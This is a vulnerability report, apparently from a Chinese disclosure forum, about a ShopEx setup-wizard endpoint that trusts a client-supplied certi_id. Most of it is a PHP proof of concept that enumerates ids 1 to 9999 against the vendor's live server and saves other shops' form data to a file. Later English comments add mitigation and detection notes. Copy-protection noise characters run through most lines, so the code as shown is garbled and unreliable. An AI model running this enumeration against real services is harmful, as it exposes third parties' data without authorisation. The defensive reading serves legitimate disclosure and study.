|
|
简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面
, x" [" d6 A3 m8 p1 ?: s0 Q3 j# M2 z. F4 u1 F- u
2 x6 K- O0 r7 i1 p+ i6 |" `# T+ k
" p; X1 r* h# I6 P# c- c* M
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
5 C& a% x8 z0 \2 D ~7 E
7 u; p# `# @& i! Q9 E
+ ^6 _, F3 S9 d' P7 b6 j: w7 R2 f& C b) w1 l+ o
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
" s* O; T; {7 d
1 [0 U6 K3 R3 f! Y; L' t
) g: Q, W+ u' C
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
: {( ?2 i7 I5 o( V
3 }: K; R9 `' d
3 X" u# h- V. d% I- Q! {" w
1 X# k& A# [% N1 x$ n' F<?php; |( z)3 B" ~' E; M# ]9 [: T
// Proof-of-concept from the report, reproduced as posted (the interleaved
// noise characters are copy-protection residue, not code). Defender's reading:
// the wizard endpoint trusts a client-supplied `certi_id` inside the
// base64-encoded `refer` parameter with no binding to an authenticated session
// and no server-side signature, so guessing ids yields other installations'
// wizard data (an insecure direct object reference). Mitigation: derive the
// id from the logged-in account or sign/session-bind the refer blob, and
// rate-limit or alert on bursts of requests with sequential ids.
) i0 L) i+ H$ p# z
// Sequential sweep 1..9999; many step2.php hits with distinct refer values
// from one client in a short window is the pattern to detect in access logs.
for ($i=1; $i < 10000; $i++) { // enumerate
' Z# K: F, @; R& r7 o/ G$ a2 n* G$ U! `1 k) N8 X
ShowshopExD($i);4 ]( v1 B# ^) {
* s3 Z* E3 c1 q7 ^ }
+ p. U P% A- O) y
/**
 * Requests the wizard page for one certi_id and, when the response echoes the
 * refer value back, extracts every <input type="text"> name/value pair,
 * prints it and appends it to c:/shopEx.txt.
 *
 * @param int|string $cid  certi_id placed in the refer JSON; coerced with intval().
 * @return void  Output goes to stdout and the file; curl/fopen errors are not checked.
 */
- h( x0 B- W: H' P0 @7 o function ShowshopExD($cid) {; q! x3 J6 ~6 e& j0 B
) a( b6 q2 R* W( y* r& q7 { $url='http://guide.ecos.shopex.cn/step2.php';' }$ `' e2 F) w5 C
// refer is plain base64 of a JSON object -- anyone can forge it, which is the flaw.
1 L6 d$ K, }2 J0 j! N $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
% l4 d( V+ b/ T& a9 U6 s; u" R' @( o4 M; L0 d& m2 x' k/ i2 \
$url = $url.'?refer='.$refer;
$ A5 f$ f h Y1 T' i" R. s
; V& _6 p3 v) v j0 U $ch = curl_init($url);0 _. r) y4 Q! ~; Z$ _! Q
5 }4 y! }/ T- ]' F
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;; o; v. A& b3 ~0 N1 K8 L) `/ L% B" t
3 _* \2 ?4 u" [ curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 \3 \" K: `, o8 o l+ z
7 l2 ?5 O" A* a# ]( C" Q" N" [. p8 E3 q $result = curl_exec($ch);: g* D- K( p8 |
. P& \6 |/ U& h
$result = mb_convert_encoding($result, "gb2312", "UTF-8");/ Q) e) S7 k" M9 m: B7 K' W5 E
// The page echoing the refer value back is taken as "this id exists".
: y% h2 }) T0 t5 u } R if(strpos($result,$refer))
( Z4 V2 m5 I2 w: g" I, a5 x; N; z6 g+ s2 t" V' g
{, d: e0 q9 `" Z+ n& S
- H/ l C& ~. w ^6 J& U $fp = fopen("c:/shopEx.txt",'ab'); // save to file
# O% }( @ o1 }# h
// Harvests the pre-filled wizard form fields (the disclosed data).
* B0 C3 m: v: f+ _8 ^6 O( G+ L preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); j1 f# |1 |$ b* g$ E+ E
/ | y& M7 F( W5 V2 E
foreach ($value[1] as $key) {! P( s3 w( t/ U/ i. d# y: a7 W
, Q& |" |( ~, w0 |. N
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
7 x) [ S( Z- f- \( `9 }2 ^
; J* Q) p8 f; H+ Z' I* l echo $res[1][0].':'.$res[3][0]."\r\n";* B, @6 T. i- ?2 r, Y5 d3 d
, o, a: l- [# Y $col =$res[1][0].':'.$res[3][0]."\r\n"; ) N/ N/ q* K. m- ?3 d! {& x
1 u9 ~, p6 C' X6 q5 J' ]
fwrite($fp, $col, strlen($col));
5 n8 b& a. B! T7 t% p& w7 _
g0 |1 c6 f/ w: h }( u8 |7 u4 q" N% h( Z. u( ]
& X) Y; J3 R8 Q- a6 _* L' z! ^* U echo '--------------------------------'."\r\n";" g- s. t/ u! `8 h5 P4 n
* P2 t" n! |1 W5 b$ R1 X- ?3 j
fclose($fp);
D% p- `% G4 U) M5 y8 X
+ K3 }' w% Y4 @, P6 a: `# l( J }
" \" a* {3 _; c* |! t Q: f, i: \8 k! h
flush();
& o3 F5 u4 u" n8 ^' b9 v/ ~3 J
) B& t6 \4 q" I7 X/ H curl_close($ch);) _" N; f6 }$ z$ J
9 `, x* p2 @2 j
}
0 s% m( |& F% w( Q2 h9 Z+ x8 E: M
$ f; T' F1 N! w% S?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式
. k% S; U3 V A) m5 x4 s$ s F |
|